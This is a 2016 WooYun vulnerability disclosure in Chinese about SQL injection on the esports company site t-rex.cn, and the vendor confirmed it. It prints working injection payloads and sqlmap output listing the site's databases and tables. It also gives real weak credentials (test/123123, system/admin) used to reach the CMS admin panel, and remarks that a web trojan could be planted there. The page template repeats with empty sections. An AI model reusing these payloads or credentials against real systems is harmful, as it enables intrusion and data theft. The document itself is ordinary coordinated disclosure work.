电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190111

漏洞标题：电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

漏洞作者： mango

提交时间：2016-03-29 14:32

修复时间：2016-05-13 14:40

公开时间：2016-05-13 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-29：细节已通知厂商并且等待厂商处理中
2016-03-29：厂商已经确认，细节仅向厂商公开
2016-04-08：细节向核心白帽子及相关领域专家公开
2016-04-18：细节向普通白帽子公开
2016-04-28：细节向实习白帽子公开
2016-05-13：细节向公众公开

简要描述：

上海锐问信息技术有限公司作为电子竞技娱乐业的一颗新星，由电竞行业领军人物和行业资深人士共同创办。公司业务涵盖游戏节目内容制作、电竞明星经纪服务等等。
旗下签约众多行业知名明星，包括业内超人气明星小苍、小米、JY、苦笑、小訫等人。制作的内容和节目均为业内标杆，包括《神探苍英雄百科》、《神探苍实战秘籍》等栏目都拥有着百万级别的点击播放量，深受着广大电竞玩家的喜爱。
公司携手行业知名明星，立志为行业明星和主播提供最优质和专业的经纪服务，并为行业培养更多的优质明星和主播。同时，我们致力于在泛娱乐圈横跨多平台，打通游戏、电竞、影视娱乐行业，与明星、战队和业内上下游公司展开深入合作，推动和促进电竞行业的升级和进一步发展。

详细说明：

先从他们公司主站进行说起
http://www.t-rex.cn/artInfo.php?id=131 主站全部都是注入,只要是有参数的都有问题（请仔细清查）

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=131 AND 8715=8715
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=131 AND (SELECT * FROM (SELECT(SLEEP(5)))swZE)
    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: id=131 UNION ALL SELECT CONCAT(0x7178787171,0x4b624a7774537658444a6d684a48436a5457464f524151566642627469496f7356517576464b644a,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] esf_master
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] trex_cn

注入出的信息
trex_cn官网的数据试过了
system 密码admin

没啥利用的不管他了
继续查看esf_master

web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
Database: esf_master
[128 tables]
+---------------------------+
| calendars                 |
| contents                  |
| failed_jobs               |
| flags                     |
| jobs                      |
| menus                     |
| messages                  |
| metas                     |
| migrations                |
| nodes                     |
| oauth_access_token_scopes |
| oauth_access_tokens       |
| oauth_auth_code_scopes    |
| oauth_auth_codes          |
| oauth_client_endpoints    |
| oauth_client_grants       |
| oauth_client_scopes       |
| oauth_clients             |
| oauth_grant_scopes        |
| oauth_grants              |
| oauth_refresh_tokens      |
| oauth_scopes              |
| oauth_session_scopes      |
| oauth_sessions            |
| pages                     |
| password_resets           |
| permission_role           |
| permission_user           |
| permissions               |
| relationships             |
| role_user                 |
| roles                     |
| setting_type              |
| settings                  |
| system_log                |
| system_options            |
| ta_activity               |
| ta_activity_prize         |
| ta_agenda_ban             |
| ta_agenda_info            |
| ta_agenda_live            |
| ta_agenda_player          |
| ta_agenda_sequence        |
| ta_agenda_team            |
| ta_agenda_video           |
| ta_app_ver                |
| ta_bad_words              |
| ta_comment                |
| ta_cron                   |
| ta_danmu                  |
| ta_ext_file               |
| ta_ext_stat               |
| ta_ext_table              |
| ta_ext_tag                |
| ta_ext_tag2               |
| ta_game_play              |
| ta_match                  |
| ta_match_player           |
| ta_match_team             |
| ta_news                   |
| ta_posts                  |
| ta_tag                    |
| ta_tag_intro              |
| ta_tucao                  |
| ta_user_ext               |
| ta_user_flag              |
| tasks                     |
| tc_agenda_player_details  |
| tc_agenda_team_details    |
| tc_album_video_related    |
| tc_cha_hero               |
| tc_cha_hero_basic_info    |
| tc_cha_hero_raider        |
| tc_cha_hero_skill         |
| tc_game                   |
| tc_game_type              |
| tc_hero                   |
| tc_hero_video             |
| tc_hero_video_related     |
| tc_lyg_details            |
| tc_lyg_event_team_result  |
| tc_lyg_part_result        |
| tc_lyg_player_event       |
| tc_lyg_player_link        |
| tc_match_agenda           |
| tc_match_game_events      |
| tc_match_hero_ranking     |
| tc_match_info             |
| tc_match_link             |
| tc_match_player           |
| tc_match_player_datas     |
| tc_match_player_ranking   |
| tc_match_sequence_detail  |
| tc_match_team_ban_heros   |
| tc_match_team_datas       |
| tc_match_team_ranking     |
| tc_match_video            |
| tc_news_detail            |
| tc_news_info              |
| tc_participle_related     |
| tc_player_hero            |
| tc_player_hero_ranking    |
| tc_player_match_result    |
| tc_player_win             |
| tc_program_info           |
| tc_program_video          |
| tc_team_info              |
| tc_user_album             |
| tc_user_info              |
| tc_user_oauth             |
| tc_user_tag               |
| tc_video_info             |
| tc_video_source           |
| tc_video_tag              |
| tc_video_type             |
| tc_weibo_content          |
| tc_weibo_user             |
| tg_hero                   |
| tg_hero_skill             |
| tg_hero_skin              |
| tg_item                   |
| tg_player                 |
| tg_player_account         |
| tg_rune                   |
| tg_summoner               |
| tg_talent                 |
| tg_team                   |
| users                     |
+---------------------------+

其中users 是APP用户的数据库
注入出小苍的数据登陆试试

然后就没了~ 没啥可以利用的数据库了

漏洞证明：

这时候域名发现一个http://cms.t-rex.cn
恩~ 应该弱口令的,使用常见的额用户名没爆破成功没办法只好再看看
回过头system_log查看这个数据,应该是系统日志,尝试注入

恩~有收获了找到用户名了然后尝试弱口令
test 123123 成功进入后台

然后修改一下发现的确有权限的~

这不就可以远程挂马了么~

修复方案：

仔细检查线上代码安全,过滤危险字符,禁止任何弱口令。

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-29 14:37

厂商回复：

感谢白帽提醒，漏洞已确认，正在进行修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190111

漏洞标题：电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

相关厂商：t-rex.cn

漏洞作者： mango

提交时间：2016-03-29 14:32

修复时间：2016-05-13 14:40

公开时间：2016-05-13 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0190111

漏洞标题：电竞Fun某站存在SQL注入上万撸友信息泄露（已进后台可远程挂马）

相关厂商：t-rex.cn

漏洞作者： mango

提交时间：2016-03-29 14:32

修复时间：2016-05-13 14:40

公开时间：2016-05-13 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0190111"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：